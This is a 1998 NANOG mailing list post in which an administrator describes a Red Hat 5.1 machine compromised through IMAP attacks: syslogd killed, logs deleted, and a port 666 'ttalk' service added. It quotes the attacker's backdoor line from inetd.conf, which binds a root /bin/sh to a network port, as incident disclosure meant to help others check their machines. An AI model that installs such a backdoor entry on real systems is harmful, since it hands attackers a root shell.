nanog mailing list archives
Re: IMAP attacks continue
From: Phil Howard <phil () whistler intur net>
Date: Mon, 23 Nov 1998 09:35:17 -0600 (CST)
An addendum to:
I found a machine that had Red Hat 5.1 unmodified running on it, and it got hit. So I closed things off and looked around for damage and found the following: 1. Syslogd had been killed off and the syslog file deleted. 2. A backdoor was installed in /etc/inetd.conf as follows: ttalk stream tcp nowait root /bin/sh sh -i
I checked the ports assignments from IANA and there is no such thing as "ttalk". I found this line in /etc/services: ttalk 666/tcp so it appears to be hijacking the port used by (as seen in the file ftp://ftp.iana.org/in-notes/iana/assignments/port-numbers): mdqs 666/tcp mdqs 666/udp doom 666/tcp doom Id Software doom 666/udp doom Id Software So also check /etc/services on any potentially compromised machines. -- -- *-----------------------------* Phil Howard KA9WGN * -- -- | Inturnet, Inc. | Director of Internet Services | -- -- | Business Internet Solutions | eng at intur.net | -- -- *-----------------------------* philh at intur.net * --
Current thread:
- IMAP attacks continue Daniel Senie (Nov 22)
- Re: IMAP attacks continue alex (Nov 22)
- Re: IMAP attacks continue Phil Howard (Nov 23)
- Re: IMAP attacks continue Phil Howard (Nov 23)
- Re: IMAP attacks continue Alex P. Rudnev (Nov 24)
- Re: IMAP attacks continue Kevin Houle (Nov 23)
- Re: IMAP attacks continue Alex P. Rudnev (Nov 24)
- Re: IMAP attacks continue Phil Howard (Nov 23)